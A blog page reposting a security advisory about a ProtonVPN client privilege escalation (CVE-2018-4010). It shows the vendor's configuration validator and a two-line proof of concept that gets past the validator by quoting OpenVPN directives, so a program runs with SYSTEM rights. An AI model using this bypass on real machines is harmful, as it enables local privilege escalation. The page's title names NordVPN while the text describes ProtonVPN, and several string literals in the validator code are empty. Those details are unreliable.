• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

CVE-2018-4010 – NordVPN Privilege Escalation

September 10, 2018 by Jack Wilder Leave a Comment

CVE-2018-4010 – NordVPN Privilege Escalation. An exploitable code execution vulnerability exists in the connect functionality of ProtonVPN VPN client 1.5.1. A specially crafted configuration file can cause a privilege escalation, resulting in the ability to execute arbitrary commands with the system’s privileges.

  • Authors: Cisco Talos
  • Risk:High
  • CVE:CVE-2018-4010
  • Date: 2018-09-08

Tested Versions

ProtonVPN VPN Client 1.5.1

Product URLs

https://protonvpn.com/download/

Details

The ProtonVPN VPN client is divided in two parts:

  • The GUI that is running with standard privilege.
  • A service that is running with system privilege.

The GUI is used to generate an OpenVPN configuration file, and asks the service to execute the OpenVPN with the configuration file in argument.

In April 2018, security firm VerSprite discovered and released CVE-2018-10169 (https://github.com/VerSprite/research/blob/master/advisories/VS-2018-017.md). To trigger this vulnerability, the attacker must add a parameter such as “plugin” or “script-security” in the OpenVPN configuration file. In this context, the plugin or the script will be executed by OpenVPN, which is executed by the service running as system.

ProtonVPN published a patch to check for the presence on the “plugin” and “script-security” option in the configuration file:

  • public class OpenVpnConfigSecurityValidator

 

{
    public bool IsValid(string file, out string reason)
    {
        reason = null;
        using (StreamReader streamReader = File.OpenText(file))
        {
            string text;
            while ((text = OpenVpnConfigSecurityValidator.ReadEntry(streamReader)) != null)
            {
                if (!text.StartsWithIgnoringCase("") && !text.StartsWithIgnoringCase("") && (OpenVpnConfigSecurityValidator.StartsWithName(text, "plugin") || OpenVpnConfigSecurityValidator.StartsWithName(text, "script-security") || OpenVpnConfigSecurityValidator.StartsWithName(text, "up") || OpenVpnConfigSecurityValidator.StartsWithName(text, "down")))
                {
                    reason = string.Format("Invalid configuration file. Reason: {0}", text);
                    return false;
                }
            }
        }
        return true;
    }
 
    private static string ReadEntry(StreamReader stream)
    {
        string text = OpenVpnConfigSecurityValidator.ReadLine(stream);
        if (text == null)
        {
            return null;
        }
        if (OpenVpnConfigSecurityValidator.StartsWithName(text, ""))
        {
            string text2 = text;
            do
            {
                text = OpenVpnConfigSecurityValidator.ReadLine(stream);
                text2 += text;
            }
            while (!text.StartsWithIgnoringCase(""));
            return text2;
        }
        if (OpenVpnConfigSecurityValidator.StartsWithName(text, ""))
        {
            string text3 = text;
            do
            {
                text = OpenVpnConfigSecurityValidator.ReadLine(stream);
                text3 += text;
            }
            while (!text.StartsWithIgnoringCase(""));
            return text3;
        }
        return text;
    }
 
    private static string ReadLine(StreamReader stream)
    {
        string expr_06 = stream.ReadLine();
        if (expr_06 == null)
        {
            return null;
        }
        return expr_06.Trim();
    }
 
    private static bool StartsWithName(string line, string name)
    {
        return line.StartsWithIgnoringCase(name + " ") || line.StartsWithIgnoringCase(name + "\t") || line.EqualsIgnoringCase(name);
    }
}

By looking at the source code of the parse_line() function of OpenVPN:

  • https://github.com/OpenVPN/openvpn/blob/5961250e776194a411a8dfc1670c5c0c73107bf8/src/openvpn/options.c

we can see that the configuration file supports the quotation mark characters. Here is a proof of concept that bypasses the validation:

"script-security" 2
"up" C:\\WINDOWS\\system32\\notepad.exe

Notepad.exe will be executed with the system privilege.

Shares

Filed Under: Privilege Escalation

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

Deface WordPress dengan Exploit WordPress Plugins WPShop File Upload Vulnerability

Heroku Custom Domain or Subdomain Takeover

Reverse Shell From Local File Inclusion Exploit

Tutorial Deface – Menutup Halaman Depan Situs Target dengan JS Overlay

Command Injection Bypass Cheatsheet

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

bWAPP Remote File Inclusion Medium Security Level

Azure Traffic Manager Custom Domain or Subdomain Takeover

LinuxSec / 64 queries in 0.10 seconds